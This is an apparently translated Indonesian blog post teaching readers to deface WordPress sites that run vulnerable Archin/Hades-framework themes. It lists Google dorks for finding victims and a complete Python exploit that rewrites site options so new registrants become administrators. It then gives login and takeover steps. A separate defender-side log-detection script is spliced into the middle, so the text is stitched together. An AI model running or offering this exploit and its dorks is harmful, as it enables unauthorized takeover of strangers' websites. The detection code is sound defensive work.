Assalamualaikum Wr Wb
First, let us give praise and thanks to Allah SWT,
because all of us have been granted health and sustenance,
amen.
#Note: In the hacking world nothing is instant; we have to keep trying as long as there is effort,
and in the hacking world there is no place for the lazy, those who are unwilling to make an effort;
those who succeed are the ones who work toward their goal.
Hello friends ^_^ this time I'm going to share yet another technique hihihihih....
What technique do you think I'll be sharing today?
Read on, hehehehe :v
INGREDIENTS:
Python, latest version <Download>
Dork:
/wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/
inurl:/wp-content/themes/felici/hades_framework/ site:.com
inurl:/wp-content/themes/shotzz/hades_framework/ site:.info
inurl:/wp-content/themes/KLR/hades_framework/ site:.uk
inurl:/wp-content/themes/yvora/hades_framework/ site:.net
intext:yvora 2011 site:.com
intext:yvora 2011 site:.uk
intext:Themes shotzz site:.nl
intitle:[flash] swf
Exploit:
/wp-content/themes/temanya/hades_framework/option_panel/ajax.php
NB: Want to see the theme name? See the trick for finding a website's theme further down.
Python exploit:
copy the following Python exploit into Notepad:
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib  # Python 2 modules, as in the original exploit

# target site (hostname only, no scheme)
site = "target website"
# path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    # The option panel's 'save' action accepts a WordPress option name/value
    # pair from any client, without authentication, and stores it.
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()

ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
NB: Replace the blue text with the target website, e.g. www.site.com <no http:// needed>
Replace the black text with the exploit path (the part of the URL after the target)
e.g. site.com/wp-content/themes/yvora/hades_framework/option_panel/ajax.php
Replace the light-blue text with your email, e.g. yazid4u@gmail.com
Save the file with the .py extension
e.g. lol.py
Still unclear? Look up how to save a .py file from Notepad on Google ^_^
How to find a website's theme (WordPress CMS):
First of all we need a target website.
The themes vulnerable to Archin are
yvora, shotzz, KLR, Averin, etc.
I picked the shotzz theme, because most of the vulnerable themes are shotzz.
Say the target is: http://kern1.linuxpl.info/kern/
Press Ctrl+U on that website's URL
Once it's open, look for this URL: www.site.tadi/wp-content/themes/themanya/style.css
For example, see the image below
NB: as in the image I marked
Then click that URL, e.g. www.site.tadi/wp-content/themes/themanya/style.css
Found it, right ^_^ the website's theme xixixixix :v
For more detail you can search on Google ^_^
TRICK (HOW TO EXECUTE):
First of all we look for a target on www.google.com or www.google.co.id
We search with whichever dork we each trust hihihihi :v
As for me, I use my trusted dork: "inurl:wp content themes shotzz" site:uk"
See the image below:
Right, once we've chosen a target, we replace the target URL with our respective exploit.
nb: exploit <adding/removing the trailing part of a website's address>
For this site the exploit is: /wp-content/themes/shotzz/hades_framework/option_panel/ajax.php
How to find a website's theme (WordPress CMS) on Google
If the page comes back blank after you apply the exploit, it means the site is vuln..!!!!
EXAMPLE, SEE THE IMAGE BELOW:
Click the Start icon > Run > type "cmd"; a command prompt will appear.
EXAMPLE:
Type "cd C:\" in that cmd
the picture will look roughly like this
NB: The Python exploit must be on drive C:\
Now edit the Python exploit: right-click the Python exploit > Open with > Notepad
Edit the file, roughly as in the image below
Then click Save
Then run the Python exploit file from cmd,
type "nameofyourfile.py", e.g. LOL.py
If you see:
200 OK
success
200 OK
success
200 OK
success
Now register a new user, they are an administrator by default!
it means it worked...!!
see the image below:
Once done, go to the site's login form,
add the following: /wp-login.php or /wp-login/
e.g. www.site.tadi/wp-login.php/
if that doesn't work, add the site's path, e.g. site.tadi/path/wp-login.php
example login form URL: site.tadi/tadi/wp-login.php
then click the Register link.
If there is no Register link because the admin disabled it,
you have to find the registration form yourself.
Default registration form paths: /wp-login.php?action=register
/wp-login?action=register
/wp-register/
if the site has a path, add the site's path ^_^
Then fill in the "username" and "email" fields
with your username and email
as in the image below ^_^
When done, the following link (see image below) will appear at the top (header)
of the registration form...
Then check your email ^_^ there will be an email from the website ^_^
NB: The email may be in the Spam, Updates, or Primary folder
now, open one of the emails from that site,
and you will be given the user <that you registered>
and the default password of that admin account.
example image below:
then log in to the website; the login form details are in the site's reply email ^_^
go ahead and log in ^^ and if it succeeds,
the view will look roughly like this
see image
ENJOY :)
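A defender-side check for the attack described above, added here as an example and not part of the original post or of bwall's exploit: it scans access-log lines for the unauthenticated POSTs to the theme's option_panel/ajax.php and the follow-on registration request from the same client, and compares live WordPress option values with the ones the exploit writes. The log lines, IP addresses and email addresses are constructed, and `owner_email` is an assumed parameter.

```python
import re
from collections import defaultdict

# Constructed sample traffic (combined log format); not taken from any real server.
# The page's exploit posts via httplib without a User-Agent, so the UA field is "-".
SAMPLE_LOG = """\
203.0.113.7 - - [29/Sep/2012:10:01:02 +0000] "GET /wp-content/themes/shotzz/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Sep/2012:10:01:09 +0000] "POST /wp-content/themes/shotzz/hades_framework/option_panel/ajax.php HTTP/1.1" 200 7 "-" "-"
203.0.113.7 - - [29/Sep/2012:10:01:10 +0000] "POST /wp-content/themes/shotzz/hades_framework/option_panel/ajax.php HTTP/1.1" 200 7 "-" "-"
203.0.113.7 - - [29/Sep/2012:10:01:11 +0000] "POST /wp-content/themes/shotzz/hades_framework/option_panel/ajax.php HTTP/1.1" 200 7 "-" "-"
203.0.113.7 - - [29/Sep/2012:10:02:30 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
198.51.100.4 - - [29/Sep/2012:11:15:00 +0000] "GET /wp-content/themes/shotzz/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# The option-panel endpoint the exploit posts to, under any theme directory.
AJAX_RE = re.compile(r'^/wp-content/themes/[^/]+/hades_framework/option_panel/ajax\.php$')
# The self-registration URLs the post lists as the follow-on step.
REGISTER_RE = re.compile(r'^/(wp-login\.php\?action=register|wp-login\?action=register|wp-register/?)$')

def detect(log_text):
    """Return (ip, message) findings: option writes, then registration from the same IP."""
    findings = []
    writes_by_ip = defaultdict(int)   # accepted option writes seen so far per client IP
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                  # not a request line we can parse; skip it
        ip, method, path, status = m.group('ip', 'method', 'path', 'status')
        if method == 'POST' and AJAX_RE.match(path):
            if status == '200':
                writes_by_ip[ip] += 1
            findings.append((ip, 'HIGH: POST to theme option_panel/ajax.php (status %s)' % status))
        elif method == 'GET' and REGISTER_RE.match(path) and writes_by_ip[ip]:
            findings.append((ip, 'CRITICAL: registration page requested after %d option writes'
                             % writes_by_ip[ip]))
    return findings

def suspicious_options(options, owner_email):
    """Compare live option values (e.g. from `wp option get`) with the values the
    exploit writes; returns the option names that currently match the attack."""
    flagged = [k for k, v in (('users_can_register', '1'), ('default_role', 'administrator'))
               if str(options.get(k)) == v]
    if options.get('admin_email') != owner_email:
        flagged.append('admin_email')   # the exploit rewrites this to the attacker's address
    return sorted(flagged)

if __name__ == '__main__':
    for ip, msg in detect(SAMPLE_LOG):
        print(ip, msg)
```

Three accepted writes followed by a registration request from the same IP is the exact sequence the exploit above produces; a site whose options still show `users_can_register=1` and `default_role=administrator` should be treated as compromised even if the log has rotated.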
Well, that's roughly my article on how to deface a website.
If you want to copy-paste this article, go ahead,
as long as you cite the source, namely cara Membobol website dengan Archin Themes vuln | Exploit wordpress
THANK YOU
http://yazzidblok4u.blogspot.com/2013/10/deface-archin-wordpress-theme-32.html